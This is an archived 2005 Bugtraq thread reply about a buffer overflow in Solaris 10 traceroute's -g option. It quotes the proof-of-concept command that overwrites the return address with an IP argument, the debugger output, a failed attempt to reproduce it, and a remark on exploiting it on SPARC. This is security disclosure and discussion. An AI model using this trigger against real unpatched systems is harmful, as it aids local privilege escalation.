Bugtraq mailing list archives
Re: Solaris 10 /usr/sbin/traceroute vulnerabilities
From: "Fermín J. Serna" <fjserna () ngsec com>
Date: Fri, 24 Jun 2005 22:19:51 +0200
Hello,Please note his tests were on X86, SPARC needs double ret in order to successfuly xploit/segfault the vulnearable program due to register windows layout on stack.
Its like xfont (x-something, don't remember) issues on old solaris, exploitable (segfault) on x86 but not on SPARC because it does exit after the first ret, so there is no double ret chance.
Best regards, David T. Moraski II wrote:
On Fri, 24 Jun 2005, Przemyslaw Frasunek wrote:/usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in handling -g argument. After supplying 10 -g parameters, return address is overwritten by IP address argument: atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 -g 9 -g 10 127.0.0.1 traceroute: too many IPv4 gateways traceroute: unknown IPv4 host 1 traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets Segmentation fault (core dumped) atari:root:/home/venglin# gdb /usr/sbin/traceroute core [...] Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 -g 9 -g 10 127.0.0'. Program terminated with signal 11, Segmentation fault. [...] #0 0x0100007f in ?? () 0x0100007f is of course 127.0.0.1.I ran the above command line on a Solaris 10 system, both as root and a regular user, and was unable to reproduce your results; traceroute did not segfault or produce a core file. What was your patch level?
-- Femín J. Serna @ NGSEC http://www.ngsec.com C\O´Donnell nº 46, 3ºB 28009 Madrid Spain Telf.: +34 91 435 56 27 Fax.: +34 91 577 84 45
Current thread:
- Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Message not available
- Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Message not available
- Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Re: Solaris 10 /usr/sbin/traceroute vulnerabilities David T. Moraski II (Jun 24)
- Re: Solaris 10 /usr/sbin/traceroute vulnerabilities Fermín J. Serna (Jun 24)